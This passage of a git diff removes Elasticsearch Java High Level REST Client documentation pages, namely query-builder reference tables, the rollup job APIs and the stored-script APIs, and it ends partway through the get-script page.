{query-ref}/QueryBuilders.html#boostingQuery-org.elasticsearch.index.query.QueryBuilder-org.elasticsearch.index.query.QueryBuilder-[QueryBuilders.boostingQuery()] -|====== - -==== Joining queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-nested-query.html[Nested] | {query-ref}/NestedQueryBuilder.html[NestedQueryBuilder] | {query-ref}/QueryBuilders.html#nestedQuery-java.lang.String-org.elasticsearch.index.query.QueryBuilder-org.apache.lucene.search.join.ScoreMode-[QueryBuilders.nestedQuery()] -| {ref}/query-dsl-has-child-query.html[Has Child] | {parentjoin-ref}/HasChildQueryBuilder.html[HasChildQueryBuilder] | -| {ref}/query-dsl-has-parent-query.html[Has Parent] | {parentjoin-ref}/HasParentQueryBuilder.html[HasParentQueryBuilder] | -| {ref}/query-dsl-parent-id-query.html[Parent Id] | {parentjoin-ref}/ParentIdQueryBuilder.html[ParentIdQueryBuilder] | -|====== - -==== Geo queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-geo-shape-query.html[GeoShape] | {query-ref}/GeoShapeQueryBuilder.html[GeoShapeQueryBuilder] | {query-ref}/QueryBuilders.html#geoShapeQuery-java.lang.String-java.lang.String-java.lang.String-[QueryBuilders.geoShapeQuery()] -| {ref}/query-dsl-geo-bounding-box-query.html[Geo Bounding Box] | {query-ref}/GeoBoundingBoxQueryBuilder.html[GeoBoundingBoxQueryBuilder] | {query-ref}/QueryBuilders.html#geoBoundingBoxQuery-java.lang.String-[QueryBuilders.geoBoundingBoxQuery()] -| {ref}/query-dsl-geo-distance-query.html[Geo Distance] | {query-ref}/GeoDistanceQueryBuilder.html[GeoDistanceQueryBuilder] | {query-ref}/QueryBuilders.html#geoDistanceQuery-java.lang.String-[QueryBuilders.geoDistanceQuery()] -| {ref}/query-dsl-geo-polygon-query.html[Geo Polygon] | {query-ref}/GeoPolygonQueryBuilder.html[GeoPolygonQueryBuilder] | {query-ref}/QueryBuilders.html#geoPolygonQuery-java.lang.String-java.util.List-[QueryBuilders.geoPolygonQuery()] -|====== - -==== Specialized queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-mlt-query.html[More Like This] | {query-ref}/MoreLikeThisQueryBuilder.html[MoreLikeThisQueryBuilder] | {query-ref}/QueryBuilders.html#moreLikeThisQuery-org.elasticsearch.index.query.MoreLikeThisQueryBuilder.Item:A-[QueryBuilders.moreLikeThisQuery()] -| {ref}/query-dsl-script-query.html[Script] | {query-ref}/ScriptQueryBuilder.html[ScriptQueryBuilder] | {query-ref}/QueryBuilders.html#scriptQuery-org.elasticsearch.script.Script-[QueryBuilders.scriptQuery()] -| {ref}/query-dsl-percolate-query.html[Percolate] | {percolate-ref}/PercolateQueryBuilder.html[PercolateQueryBuilder] | -| {ref}/query-dsl-wrapper-query.html[Wrapper] | {query-ref}/WrapperQueryBuilder.html[WrapperQueryBuilder] | {query-ref}/QueryBuilders.html#wrapperQuery-java.lang.String-[QueryBuilders.wrapperQuery()] -| {ref}/query-dsl-rank-feature-query.html[Rank Feature] | {mapper-extras-ref}/RankFeatureQuery.html[RankFeatureQueryBuilder] | -| {ref}/query-dsl-pinned-query.html[Pinned Query] | The PinnedQueryBuilder is packaged as part of the xpack-core module | -|====== - -==== Span queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-span-term-query.html[Span Term] | {query-ref}/SpanTermQueryBuilder.html[SpanTermQueryBuilder] | {query-ref}/QueryBuilders.html#spanTermQuery-java.lang.String-double-[QueryBuilders.spanTermQuery()] -| 
{ref}/query-dsl-span-multi-term-query.html[Span Multi Term] | {query-ref}/SpanMultiTermQueryBuilder.html[SpanMultiTermQueryBuilder] | {query-ref}/QueryBuilders.html#spanMultiTermQueryBuilder-org.elasticsearch.index.query.MultiTermQueryBuilder-[QueryBuilders.spanMultiTermQueryBuilder()] -| {ref}/query-dsl-span-first-query.html[Span First] | {query-ref}/SpanFirstQueryBuilder.html[SpanFirstQueryBuilder] | {query-ref}/QueryBuilders.html#spanFirstQuery-org.elasticsearch.index.query.SpanQueryBuilder-int-[QueryBuilders.spanFirstQuery()] -| {ref}/query-dsl-span-near-query.html[Span Near] | {query-ref}/SpanNearQueryBuilder.html[SpanNearQueryBuilder] | {query-ref}/QueryBuilders.html#spanNearQuery-org.elasticsearch.index.query.SpanQueryBuilder-int-[QueryBuilders.spanNearQuery()] -| {ref}/query-dsl-span-or-query.html[Span Or] | {query-ref}/SpanOrQueryBuilder.html[SpanOrQueryBuilder] | {query-ref}/QueryBuilders.html#spanOrQuery-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanOrQuery()] -| {ref}/query-dsl-span-not-query.html[Span Not] | {query-ref}/SpanNotQueryBuilder.html[SpanNotQueryBuilder] | {query-ref}/QueryBuilders.html#spanNotQuery-org.elasticsearch.index.query.SpanQueryBuilder-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanNotQuery()] -| {ref}/query-dsl-span-containing-query.html[Span Containing] | {query-ref}/SpanContainingQueryBuilder.html[SpanContainingQueryBuilder] | {query-ref}/QueryBuilders.html#spanContainingQuery-org.elasticsearch.index.query.SpanQueryBuilder-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanContainingQuery()] -| {ref}/query-dsl-span-within-query.html[Span Within] | {query-ref}/SpanWithinQueryBuilder.html[SpanWithinQueryBuilder] | {query-ref}/QueryBuilders.html#spanWithinQuery-org.elasticsearch.index.query.SpanQueryBuilder-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanWithinQuery()] -| {ref}/query-dsl-span-field-masking-query.html[Span Field Masking] | {query-ref}/FieldMaskingSpanQueryBuilder.html[FieldMaskingSpanQueryBuilder] | {query-ref}/QueryBuilders.html#fieldMaskingSpanQuery-org.elasticsearch.index.query.SpanQueryBuilder-java.lang.String-[QueryBuilders.fieldMaskingSpanQuery()] -|====== diff --git a/docs/java-rest/high-level/rollup/delete_job.asciidoc b/docs/java-rest/high-level/rollup/delete_job.asciidoc deleted file mode 100644 index 22b8787799a..00000000000 --- a/docs/java-rest/high-level/rollup/delete_job.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: rollup-delete-job -:request: DeleteRollupJobRequest -:response: DeleteRollupJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Rollup Job API - -experimental::[] - -[id="{upid}-{api}-request"] -==== Request - -The Delete Rollup Job API allows you to delete a job by ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the job to delete. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete command was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete job request was received. 
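-
-As an illustration (not a tested snippet), deleting a job synchronously might
-look like the sketch below. The job name is made up and, as elsewhere, `client`
-is an existing `RestHighLevelClient`; the concrete response class can differ
-between client versions, so treat the types here as assumptions to verify.
-
-[source,java]
---------------------------------------------------
-DeleteRollupJobRequest request = new DeleteRollupJobRequest("sensor-rollup-job"); // ID of the job to delete
-DeleteRollupJobResponse response =
-    client.rollup().deleteRollupJob(request, RequestOptions.DEFAULT);
-boolean acknowledged = response.isAcknowledged(); // whether the delete command was received
---------------------------------------------------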
- -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/rollup/get_job.asciidoc b/docs/java-rest/high-level/rollup/get_job.asciidoc deleted file mode 100644 index 5ed65ebfaec..00000000000 --- a/docs/java-rest/high-level/rollup/get_job.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-rollup-get-job]] -=== Get Rollup Job API - -experimental::[] - -The Get Rollup Job API can be used to get one or all rollup jobs from the -cluster. It accepts a `GetRollupJobRequest` object as a request and returns -a `GetRollupJobResponse`. - -[[java-rest-high-x-pack-rollup-get-rollup-job-request]] -==== Get Rollup Job Request - -A `GetRollupJobRequest` can be built without any parameters to get all of the -rollup jobs or with a job name to get a single job: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-request] --------------------------------------------------- -<1> Gets all jobs. -<2> Gets `job_1`. - -[[java-rest-high-x-pack-rollup-get-rollup-job-execution]] -==== Execution - -The Get Rollup Job API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-rollup-get-rollup-job-response]] -==== Response - -The returned `GetRollupJobResponse` includes a `JobWrapper` per returned job -which contains the configuration of the job, the job's current status, and -statistics about the job's past execution. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-response] --------------------------------------------------- -<1> We only asked for a single job - -[[java-rest-high-x-pack-rollup-get-rollup-job-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-execute-async] --------------------------------------------------- -<1> The `GetRollupJobRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetRollupJobResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/get_rollup_caps.asciidoc b/docs/java-rest/high-level/rollup/get_rollup_caps.asciidoc deleted file mode 100644 index f4c9240f781..00000000000 --- a/docs/java-rest/high-level/rollup/get_rollup_caps.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ --- -:api: rollup-get-rollup-caps -:request: GetRollupCapsRequest -:response: GetRollupCapsResponse --- -[role="xpack"] -[id="{upid}-x-pack-{api}"] -=== Get Rollup Capabilities API - -experimental::[] - -The Get Rollup Capabilities API allows the user to query a target index pattern (`logstash-*`, etc) -and determine if there are any rollup jobs that are/were configured to rollup that pattern. -The API accepts a `GetRollupCapsRequest` object as a request and returns a `GetRollupCapsResponse`. - -[id="{upid}-x-pack-{api}-request"] -==== Get Rollup Capabilities Request - -A +{request}+ requires a single parameter: the target index or index pattern (e.g. `logstash-*`): - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-request] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-execution"] -==== Execution - -The Get Rollup Capabilities API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-response"] -==== Response - -The returned +{response}+ holds lists and maps of values which correspond to the capabilities -of the target index/index pattern (what jobs were configured for the pattern, where the data is stored, what -aggregations are available, etc). It provides essentially the same data as the original job configuration, -just presented in a different manner. - -For example, if we had created a job with the following config: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-setup] --------------------------------------------------- - -The +{response}+ object would contain the same information, laid out in a slightly different manner: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-response] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-async"] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. 
- -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/get_rollup_index_caps.asciidoc b/docs/java-rest/high-level/rollup/get_rollup_index_caps.asciidoc deleted file mode 100644 index 2e08409d1e2..00000000000 --- a/docs/java-rest/high-level/rollup/get_rollup_index_caps.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ --- -:api: rollup-get-rollup-index-caps -:request: GetRollupIndexCapsRequest -:response: GetRollupIndexCapsResponse --- -[role="xpack"] -[id="{upid}-x-pack-{api}"] -=== Get Rollup Index Capabilities API - -experimental::[] - -The Get Rollup Index Capabilities API allows the user to determine if a concrete index or index pattern contains -stored rollup jobs and data. If it contains data stored from rollup jobs, the capabilities of those jobs -are returned. The API accepts a `GetRollupIndexCapsRequest` object as a request and returns a `GetRollupIndexCapsResponse`. - -[id="{upid}-x-pack-{api}-request"] -==== Get Rollup Index Capabilities Request - -A +{request}+ requires a single parameter: the target index or index pattern (e.g. `rollup-foo`): - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-request] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-execution"] -==== Execution - -The Get Rollup Index Capabilities API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-response"] -==== Response - -The returned +{response}+ holds lists and maps of values which correspond to the capabilities -of the rollup index/index pattern (what jobs are stored in the index, their capabilities, what -aggregations are available, etc). Because multiple jobs can be stored in one index, the -response may include several jobs with different configurations. - -The capabilities are essentially the same as the original job configuration, just presented in a different -manner. 
For example, if we had created a job with the following config: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-setup] --------------------------------------------------- - -The +{response}+ object would contain the same information, laid out in a slightly different manner: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-response] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-async"] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/put_job.asciidoc b/docs/java-rest/high-level/rollup/put_job.asciidoc deleted file mode 100644 index b43f257937c..00000000000 --- a/docs/java-rest/high-level/rollup/put_job.asciidoc +++ /dev/null @@ -1,175 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-rollup-put-job]] -=== Put Rollup Job API - -experimental::[] - -The Put Rollup Job API can be used to create a new Rollup job -in the cluster. The API accepts a `PutRollupJobRequest` object -as a request and returns a `PutRollupJobResponse`. - -[[java-rest-high-x-pack-rollup-put-rollup-job-request]] -==== Put Rollup Job Request - -A `PutRollupJobRequest` requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-request] --------------------------------------------------- -<1> The configuration of the Rollup job to create as a `RollupJobConfig` - -[[java-rest-high-x-pack-rollup-put-rollup-job-config]] -==== Rollup Job Configuration - -The `RollupJobConfig` object contains all the details about the rollup job -configuration. See {ref}/rollup-put-job.html[create rollup job API] to learn more -about the various configuration settings. 
-
-A `RollupJobConfig` requires the following arguments:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-config]
---------------------------------------------------
-<1> The name of the Rollup job
-<2> The index (or index pattern) to roll up
-<3> The index to store rollup results into
-<4> A cron expression which defines when the Rollup job should be executed
-<5> The page size to use for the Rollup job
-<6> The grouping configuration of the Rollup job as a `GroupConfig`
-<7> The metrics configuration of the Rollup job as a list of `MetricConfig`
-<8> The timeout value to use for the Rollup job as a `TimeValue`
-
-
-[[java-rest-high-x-pack-rollup-put-rollup-job-group-config]]
-==== Grouping Configuration
-
-The grouping configuration of the Rollup job is defined in the `RollupJobConfig`
-using a `GroupConfig` instance. `GroupConfig` reflects all the configuration
-settings that can be defined using the REST API. See {ref}/rollup-put-job.html#rollup-groups-config[Grouping config]
-to learn more about these settings.
-
-Using the REST API, we could define this grouping configuration:
-
-[source,js]
---------------------------------------------------
-"groups" : {
-  "date_histogram": {
-    "field": "timestamp",
-    "calendar_interval": "1h",
-    "delay": "7d",
-    "time_zone": "UTC"
-  },
-  "terms": {
-    "fields": ["hostname", "datacenter"]
-  },
-  "histogram": {
-    "fields": ["load", "net_in", "net_out"],
-    "interval": 5
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
-
-Using the `GroupConfig` object and the high level REST client, the same
-configuration would be:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-group-config]
---------------------------------------------------
-<1> The date histogram aggregation to use to roll up documents, as a `DateHistogramGroupConfig`
-<2> The terms aggregation to use to roll up documents, as a `TermsGroupConfig`
-<3> The histogram aggregation to use to roll up documents, as a `HistogramGroupConfig`
-<4> The grouping configuration as a `GroupConfig`
-
-
-[[java-rest-high-x-pack-rollup-put-rollup-job-metrics-config]]
-==== Metrics Configuration
-
-After defining which groups should be generated for the data, you next configure
-which metrics should be collected. The list of metrics is defined in the `RollupJobConfig`
-using a `List` of `MetricConfig` instances. `MetricConfig` reflects all the configuration
-settings that can be defined using the REST API. See {ref}/rollup-put-job.html#rollup-metrics-config[Metrics config]
-to learn more about these settings.
- -Using the REST API, we could define this metrics configuration: - -[source,js] --------------------------------------------------- -"metrics": [ - { - "field": "temperature", - "metrics": ["min", "max", "sum"] - }, - { - "field": "voltage", - "metrics": ["avg", "value_count"] - } -] --------------------------------------------------- -// NOTCONSOLE - -Using the `MetricConfig` object and the high level REST client, the same -configuration would be: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-metrics-config] --------------------------------------------------- -<1> The list of `MetricConfig` to configure in the `RollupJobConfig` -<2> Adds the metrics to compute on the `temperature` field -<3> Adds the metrics to compute on the `voltage` field - - -[[java-rest-high-x-pack-rollup-put-rollup-job-execution]] -==== Execution - -The Put Rollup Job API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-rollup-put-rollup-job-response]] -==== Response - -The returned `PutRollupJobResponse` indicates if the new Rollup job -has been successfully created: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-response] --------------------------------------------------- -<1> `acknowledged` is a boolean indicating whether the job was successfully created - -[[java-rest-high-x-pack-rollup-put-rollup-job-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-execute-async] --------------------------------------------------- -<1> The `PutRollupJobRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutRollupJobResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/search.asciidoc b/docs/java-rest/high-level/rollup/search.asciidoc deleted file mode 100644 index ac70ed742f1..00000000000 --- a/docs/java-rest/high-level/rollup/search.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ --- -:api: search -:request: SearchRequest -:response: SearchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Rollup Search API - -experimental::[] - -The Rollup Search endpoint allows searching rolled-up data using the standard -query DSL. The Rollup Search endpoint is needed because, internally, -rolled-up documents utilize a different document structure than the original -data. The Rollup Search endpoint rewrites standard query DSL into a format that -matches the rollup documents, then takes the response and rewrites it back to -what a client would expect given the original query. - -[id="{upid}-{api}-request"] -==== Request - -Rollup Search uses the same +{request}+ that is used by the <<{mainid}-search>> -but it is mostly for aggregations you should set the `size` to 0 and add -aggregations like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -NOTE:: Rollup Search is limited in many ways because only some query elements -can be translated into queries against the rollup indices. See the main -{ref}/rollup-search.html[Rollup Search] documentation for more. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -Rollup Search returns the same +{response}+ that is used by the -<<{mainid}-search>> and everything can be accessed in exactly the same way. -This will access the aggregation built by the example request above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/rollup/start_job.asciidoc b/docs/java-rest/high-level/rollup/start_job.asciidoc deleted file mode 100644 index 0e0fc073ac6..00000000000 --- a/docs/java-rest/high-level/rollup/start_job.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: rollup-start-job -:request: StartRollupJobRequest -:response: StartRollupJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start Rollup Job API - -experimental::[] - -[id="{upid}-{api}-request"] -==== Request - -The Start Rollup Job API allows you to start a job by ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the job to start. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the start command was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the start job request was received. 
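Concretely, starting a job and checking the acknowledgement might look roughly like this
(a sketch: `client` is an assumed, already built `RestHighLevelClient`, `"job_1"` is a
hypothetical job id and imports are omitted):

[source,java]
--------------------------------------------------
StartRollupJobRequest request = new StartRollupJobRequest("job_1"); // id of the job to start
StartRollupJobResponse response =
    client.rollup().startRollupJob(request, RequestOptions.DEFAULT);
boolean acknowledged = response.isAcknowledged(); // true if the start request was received
--------------------------------------------------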
- -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/rollup/stop_job.asciidoc b/docs/java-rest/high-level/rollup/stop_job.asciidoc deleted file mode 100644 index 9ebd97dc837..00000000000 --- a/docs/java-rest/high-level/rollup/stop_job.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: rollup-stop-job -:request: StopRollupJobRequest -:response: StopRollupJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop Rollup Job API - -experimental::[] - -[id="{upid}-{api}-request"] -==== Request - -The Stop Rollup Job API allows you to stop a job by ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the job to stop. -<2> Whether the request should wait that the stop operation has completed -before returning (optional, defaults to `false`) -<3> If `wait_for_completion=true`, this parameter controls how long to wait -before giving up and throwing an error (optional, defaults to 30 seconds). - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the stop command was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the stop job request was received. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/script/delete_script.asciidoc b/docs/java-rest/high-level/script/delete_script.asciidoc deleted file mode 100644 index 79b3b0b3247..00000000000 --- a/docs/java-rest/high-level/script/delete_script.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[java-rest-high-delete-stored-script]] - -=== Delete Stored Script API - -[[java-rest-high-delete-stored-script-request]] -==== Delete Stored Script Request - -A `DeleteStoredScriptRequest` requires an `id`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-request] --------------------------------------------------- -<1> The id of the script - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the stored script is deleted as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the stored script is deleted as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-delete-stored-script-sync]] -==== Synchronous Execution -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-execute] --------------------------------------------------- - 
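Putting the pieces above together, a synchronous delete might look roughly like this
(a sketch: `client` is an assumed, already built `RestHighLevelClient`,
`"calculate-score"` is a hypothetical script id and imports are omitted):

[source,java]
--------------------------------------------------
DeleteStoredScriptRequest request = new DeleteStoredScriptRequest("calculate-score");
request.timeout(TimeValue.timeValueMinutes(2));           // node acknowledgement timeout
request.masterNodeTimeout(TimeValue.timeValueMinutes(1)); // master node timeout

DeleteStoredScriptResponse response = client.deleteScript(request, RequestOptions.DEFAULT);
boolean acknowledged = response.isAcknowledged();         // true if all nodes acknowledged
--------------------------------------------------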
-[[java-rest-high-delete-stored-script-async]] -==== Asynchronous Execution - -The asynchronous execution of a delete stored script request requires both the `DeleteStoredScriptRequest` -instance and an `ActionListener` instance to be passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-execute-async] --------------------------------------------------- -<1> The `DeleteStoredScriptRequest` to execute and the `ActionListener` to use when -the execution completes - -[[java-rest-high-delete-stored-script-listener]] -===== Action Listener - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteStoredScriptResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-delete-stored-script-response]] -==== Delete Stored Script Response - -The returned `DeleteStoredScriptResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/script/get_script.asciidoc b/docs/java-rest/high-level/script/get_script.asciidoc deleted file mode 100644 index a38bdad2bd6..00000000000 --- a/docs/java-rest/high-level/script/get_script.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[java-rest-high-get-stored-script]] - -=== Get Stored Script API - -[[java-rest-high-get-stored-script-request]] -==== Get Stored Script Request - -A `GetStoredScriptRequest` requires an `id`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-request] --------------------------------------------------- -<1> The id of the script - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-get-stored-script-sync]] -==== Synchronous Execution 